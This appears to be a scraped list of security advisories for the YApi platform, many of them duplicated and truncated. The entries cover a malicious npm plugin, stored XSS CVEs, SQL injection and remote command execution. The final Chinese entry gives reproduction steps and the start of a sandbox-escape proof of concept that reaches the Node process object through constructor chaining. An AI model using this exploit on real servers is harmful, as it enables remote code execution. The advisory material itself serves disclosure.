Malicious code in yapi-plugin-games-google-login (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 50fd58da7aed5c7f4b93b71f00b778b524976db87da82ad0c037d021e2197649 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2024-11021 Malicious code in yapi-plugin-games-google-login (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 50fd58da7aed5c7f4b93b71f00b778b524976db87da82ad0c037d021e2197649 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

CVE-2024-33831

A stored cross-site scripting XSS vulnerability in the Advanced Expectation - Response module of yapi v1.10.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the body field...

CVE-2024-33831

A stored cross-site scripting XSS vulnerability in the Advanced Expectation - Response module of yapi v1.10.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the body field...

PT-2024-25502 · Yapi · Yapi

Name of the Vulnerable Software and Affected Versions: yapi version 1.10.2 Description: A stored cross-site scripting XSS vulnerability in the Advanced Expectation - Response module allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the body field...

yapi 安全漏洞

YMFE YApi is a visual interface management platform from YMFE, Inc. A security vulnerability exists in yapi version v1.10.2, which stems from the presence of a stored cross-site scripting XSS vulnerability that allows an attacker to execute arbitrary web script or HTML by injecting a crafted...

CVE-2024-33831

A stored cross-site scripting XSS vulnerability in the Advanced Expectation - Response module of yapi v1.10.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the body field...

CVE-2024-33831

CVE-2024-33831 describes a stored cross-site scripting (XSS) vulnerability in the Advanced Expectation - Response module of yapi v1.10.2 . The issue allows an attacker to inject a crafted payload into the body field , enabling execution of arbitrary web scripts or HTML in the victim’s browser. Co...

Cross-site Scripting in yapi-vendor

Cross Site Scripting XSS vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...

GHSA-4JQW-VFMJ-9RMH Cross-site Scripting in yapi-vendor

Cross Site Scripting XSS vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...

CVE-2021-36686

Cross Site Scripting XSS vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...

CVE-2021-36686

Cross Site Scripting XSS vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...

Cross site scripting

Cross Site Scripting XSS vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...

PT-2023-12296 · Yapi · Yapi

Name of the Vulnerable Software and Affected Versions: yapi version 1.9.1 Description: A Cross Site Scripting XSS issue allows attackers to execute arbitrary code via the "interface/api" edit page. Recommendations: For yapi version 1.9.1, update to a newer version that contains a fix for this iss...

CVE-2021-36686

Cross Site Scripting XSS vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...

CVE-2021-36686

Cross Site Scripting XSS vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page...

YMFE YApi 跨站脚本漏洞

YMFE YApi is a visual interface management platform from YMFE Corporation. A security vulnerability exists in YMFE YApi version 1.9.1. An attacker can exploit this vulnerability to execute arbitrary code via the /interface/api edit page...

CVE-2021-36686

CVE-2021-36686 is an XSS vulnerability in YMFE YApi 1.9.1, exploitable via the /interface/api edit page. The issue affects the web interface code path used to edit API definitions; the precise root cause is described as a Cross Site Scripting flaw. The CVE entry notes that PoC exploits exist (exp...

YAPI SQL Injection Vulnerability

YAPI is an api management platform. YAPI is vulnerable to SQL injection, which can be exploited by attackers to obtain user token and cause command execution...

Yapi 远程命令执行漏洞

如何复现此问题 登录注册后，创建一个项目 然后选择设置全局的mock脚本，设置命令为远程访问我的服务器地址。 随后添加接口，访问接口的mock地址 服务器可看到响应如下，远程服务器接受到请求 poc: const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor'return process' const process = myfun...